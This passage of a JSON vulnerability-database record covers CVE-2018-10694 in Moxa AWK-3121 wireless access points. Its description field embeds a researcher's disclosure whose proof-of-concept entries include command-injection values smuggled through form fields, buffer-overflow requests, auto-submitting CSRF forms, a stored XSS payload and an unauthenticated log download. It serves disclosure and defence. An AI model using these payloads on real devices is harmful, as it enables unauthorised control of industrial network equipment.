"id": "CNVD-2019-23550"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015589"
},
{
"db": "NVD",
"id": "CVE-2018-10694"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10694"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10694",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10694",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-23550",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120479",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10694",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10694",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-23550",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-322",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120479",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10694",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23550"
},
{
"db": "VULHUB",
"id": "VHN-120479"
},
{
"db": "VULMON",
"id": "CVE-2018-10694"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015589"
},
{
"db": "NVD",
"id": "CVE-2018-10694"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-322"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user\u0027s computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user\u0027s computer very easily as well. Moxa AWK-3121 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaAWK-3121 is an industrial-grade wireless access point for Moxa Corporation of Taiwan, China. There is a cryptographic vulnerability in the MoxaAWK-31211.14 release. The vulnerability stems from the network system or product not using the relevant cryptographic algorithm correctly, resulting in content not being properly encrypted, weakly encrypted, and plaintext storage sensitive information. A trust management issue vulnerability exists in Moxa AWK-3121 version 1.14. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). However, the same functionality allows an attacker to download\n the file without any authentication or authorization. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n This allows an attacker who is able to execute a cross-site\n scripting attack to steal the cookie very easily. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n However, the same functionality allows an attacker to execute commands\n on the device. The POST parameter \"srvName\" is susceptible to a buffer\n overflow. By crafting a packet that contains a string of\n 516 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n It provides alert functionality so that an\n administrator can send emails to his/her account when there are\n changes to the device\u0027s network. However, the same functionality allows\n an attacker to execute commands on the device. The POST parameters\n \"to1,to2,to3,to4\" are all susceptible to buffer overflow. By crafting\n a packet that contains a string of 678 characters, it is\n possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. However, this interface is not protected against\n CSRF attacks, which allows an attacker to trick an administrator into\n executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and\n forms/webSetMainRestart URIs. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n However, the same functionality allows an attacker to execute commands\n on the device. The POST parameter \"srvName\" is susceptible to this\n injection. By crafting a packet that contains shell metacharacters,\n it is possible for an attacker to\n execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. However, the same functionality allows an attacker\n to execute commands on the device. The POST parameter \"iw_privatePass\"\n is susceptible to this injection. By crafting a packet that contains shell metacharacters,\n it is possible\n for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. It\n provides functionality so that an administrator can change the\n name of the device. However, the same functionality allows an attacker\n to execute XSS by injecting an XSS payload. The POST parameter\n \"iw_board_deviceName\" is susceptible to this injection. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. However,\n the same functionality allows an attacker to execute commands on the\n device. The POST parameter \"iw_filename\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 162 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. However,\n the same functionality allows an attacker to execute commands on the\n device. The POST parameter \"iw_filename\" is susceptible to command\n injection via shell metacharacters. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. However,\n the same functionality allows an attacker to execute commands on the\n device. The POST parameter \"iw_serverip\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 480 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10694"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015589"
},
{
"db": "CNVD",
"id": "CNVD-2019-23550"
},
{
"db": "VULHUB",
"id": "VHN-120479"
},
{
"db": "VULMON",
"id": "CVE-2018-10694"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10694",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015589",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-322",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-23550",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120479",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10694",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23550"
},
{
"db": "VULHUB",
"id": "VHN-120479"
},
{
"db": "VULMON",
"id": "CVE-2018-10694"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015589"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10694"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-322"
}
]
},
"id": "VAR-201906-0784",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23550"
},
{
"db": "VULHUB",
"id": "VHN-120479"
}
],
"trust": 0.06999999999999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23550"
}
]
},
"last_update_date": "2023-12-18T12:00:03.810000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
